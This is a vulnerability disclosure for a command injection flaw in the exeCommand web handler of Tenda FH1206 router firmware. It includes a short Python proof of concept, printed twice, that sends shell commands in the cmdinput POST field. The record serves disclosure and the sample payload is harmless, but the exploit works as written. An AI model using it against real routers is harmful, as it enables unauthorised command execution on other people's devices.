[ Discoverer: ta0lve ]

Overview

Tenda FH1206 V1.2.0.8(8155)

• Firmware download website:
  • https://www.tendacn.com/hk/download/detail-2344.html
  • https://www.tendacn.com/us/download/detail-2344.html

Affected version

V1.2.0.8(8155)

Vulnerability details

The Tenda FH1206 V1.2.0.8(8155) has a command injection vulnerablility located in the formexeCommand function. The src variable receives the cmdinput parameter from a POST request and is later assigned to the v7 variable, which is directly used in the doSystemCmd function, causing an arbitrary command execution. The user-provided cmdinput can trigger this security vulnerability

PoC

# formexeCommand_RCE

import requests

ip = '192.168.0.100:80'

url = f"http://{ip}/goform/exeCommand"

data = {'cmdinput':'echo \\'hack!!!\\';ls;'}

ret = requests.post(url, data)

Additional Information

###Vulnerability type
CWE-94
Improper Control of Generation of Code ('Code Injection')
Remote Code Execution (RCE)

###Vendor of the product(s)
Tenda FH1206 V1.2.0.8(8155)

###Product_version
Tenda FH1206 
V1.2.0.8(8155)

###Attack type
Remote

###Affected_component
the "formexeCommand " function of /bin/httpd; /bin/httpd

###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/exeCommand"
data = {'cmdinput':'echo \\'hack!!!\\';ls;'}
ret = requests.post(url, data)

###Discription
Tenda FH1206 V1.2.0.8(8155) was discovered to contain a command injection vulnerability via the cmdinput parameter at ip/goform/formexeCommand.

###Refernce
<https://palm-vertebra-fe9.notion.site/formexeCommand_RCE-91a5f12ae23a42b4a25f5d1d4de308da>
<https://www.tendacn.com/hk/download/detail-2344.html>